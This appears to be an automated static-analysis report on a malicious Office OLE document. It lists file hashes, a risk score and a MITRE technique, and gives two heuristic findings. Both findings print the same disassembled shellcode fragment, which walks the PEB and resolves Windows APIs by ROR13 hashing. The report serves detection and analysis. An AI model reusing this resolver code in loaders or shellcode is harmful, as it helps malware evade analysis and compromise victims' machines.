Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6bb42f2d716241a5…

MALICIOUS

Office (OLE)

376.5 KB First seen: 2015-09-24
MD5: 63b89663589a5afa69918b4aaf4e7d50 SHA-1: f807fe8be04d2f3621e12f330267a411b0312459 SHA-256: 6bb42f2d716241a5e03ca68da33e24dc98ff2991504d1ccf8df710d1450a8b54
80 Risk Score

Malware Insights

MITRE ATT&CK
T1218.011 Signed Binary Proxy Execution: Rundll32

The sample exhibits high-severity heuristic firings related to PEB access and API hash resolution, indicating sophisticated evasion techniques. These methods are commonly employed by malware loaders to obfuscate their actions and avoid static analysis. While no specific document body or script content was extracted, the presence of these advanced evasion techniques strongly suggests the file's purpose is to download and execute a secondary malicious payload.

Heuristics 2

  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (0.984) — 8/8 branch targets land on an instruction boundary (100% coherence)
    0003EF36  648b4030          mov eax, dword ptr fs:[eax + 0x30]
    0003EF3A  8b400c            mov eax, dword ptr [eax + 0xc]
    0003EF3D  8b701c            mov esi, dword ptr [eax + 0x1c]
    0003EF40  ad                lodsd eax, dword ptr [esi]
    0003EF41  8b6808            mov ebp, dword ptr [eax + 8]
    0003EF44  51                push ecx
    0003EF45  56                push esi
    0003EF46  57                push edi
    0003EF47  8b453c            mov eax, dword ptr [ebp + 0x3c]
    0003EF4A  368b542878        mov edx, dword ptr ss:[eax + ebp + 0x78]
    0003EF4F  03d5              add edx, ebp
    0003EF51  52                push edx
    0003EF52  8b5220            mov edx, dword ptr [edx + 0x20]
    0003EF55  03d5              add edx, ebp
    0003EF57  33c0              xor eax, eax
    0003EF59  33c9              xor ecx, ecx
    0003EF5B  41                inc ecx
    0003EF5C  8b348a            mov esi, dword ptr [edx + ecx*4]
    0003EF5F  03f5              add esi, ebp
    0003EF61  33ff              xor edi, edi
    0003EF63  c1cf0d            ror edi, 0xd
    0003EF66  ac                lodsb al, byte ptr [esi]
    0003EF67  03f8              add edi, eax
    0003EF69  85c0              test eax, eax
    0003EF6B  75f6              jne 0x3ef63
    0003EF6D  3bfb              cmp edi, ebx
    0003EF6F  75ea              jne 0x3ef5b
    0003EF71  5a                pop edx
    0003EF72  8b5a24            mov ebx, dword ptr [edx + 0x24]
    0003EF75  03dd              add ebx, ebp
    0003EF77  668b0c4b          mov cx, word ptr [ebx + ecx*2]
    0003EF7B  8b5a1c            mov ebx, dword ptr [edx + 0x1c]
    0003EF7E  03dd              add ebx, ebp
    0003EF80  8b048b            mov eax, dword ptr [ebx + ecx*4]
    0003EF83  03c5              add eax, ebp
    0003EF85  5f                pop edi
    0003EF86  5e                pop esi
    0003EF87  59                pop ecx
    0003EF88  83f901            cmp ecx, 1
    0003EF8B  7408              je 0x3ef95
    0003EF8D  8bff              mov edi, edi
    0003EF8F  55                push ebp
    0003EF90  8bec              mov ebp, esp
    0003EF92  83c005            add eax, 5
    0003EF95  ff                .byte 0xff
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly
    x86 disassembly · validity: code (0.984) — 8/8 branch targets land on an instruction boundary (100% coherence)
    0003EF36  648b4030          mov eax, dword ptr fs:[eax + 0x30]
    0003EF3A  8b400c            mov eax, dword ptr [eax + 0xc]
    0003EF3D  8b701c            mov esi, dword ptr [eax + 0x1c]
    0003EF40  ad                lodsd eax, dword ptr [esi]
    0003EF41  8b6808            mov ebp, dword ptr [eax + 8]
    0003EF44  51                push ecx
    0003EF45  56                push esi
    0003EF46  57                push edi
    0003EF47  8b453c            mov eax, dword ptr [ebp + 0x3c]
    0003EF4A  368b542878        mov edx, dword ptr ss:[eax + ebp + 0x78]
    0003EF4F  03d5              add edx, ebp
    0003EF51  52                push edx
    0003EF52  8b5220            mov edx, dword ptr [edx + 0x20]
    0003EF55  03d5              add edx, ebp
    0003EF57  33c0              xor eax, eax
    0003EF59  33c9              xor ecx, ecx
    0003EF5B  41                inc ecx
    0003EF5C  8b348a            mov esi, dword ptr [edx + ecx*4]
    0003EF5F  03f5              add esi, ebp
    0003EF61  33ff              xor edi, edi
    0003EF63  c1cf0d            ror edi, 0xd
    0003EF66  ac                lodsb al, byte ptr [esi]
    0003EF67  03f8              add edi, eax
    0003EF69  85c0              test eax, eax
    0003EF6B  75f6              jne 0x3ef63
    0003EF6D  3bfb              cmp edi, ebx
    0003EF6F  75ea              jne 0x3ef5b
    0003EF71  5a                pop edx
    0003EF72  8b5a24            mov ebx, dword ptr [edx + 0x24]
    0003EF75  03dd              add ebx, ebp
    0003EF77  668b0c4b          mov cx, word ptr [ebx + ecx*2]
    0003EF7B  8b5a1c            mov ebx, dword ptr [edx + 0x1c]
    0003EF7E  03dd              add ebx, ebp
    0003EF80  8b048b            mov eax, dword ptr [ebx + ecx*4]
    0003EF83  03c5              add eax, ebp
    0003EF85  5f                pop edi
    0003EF86  5e                pop esi
    0003EF87  59                pop ecx
    0003EF88  83f901            cmp ecx, 1
    0003EF8B  7408              je 0x3ef95
    0003EF8D  8bff              mov edi, edi
    0003EF8F  55                push ebp
    0003EF90  8bec              mov ebp, esp
    0003EF92  83c005            add eax, 5
    0003EF95  ff                .byte 0xff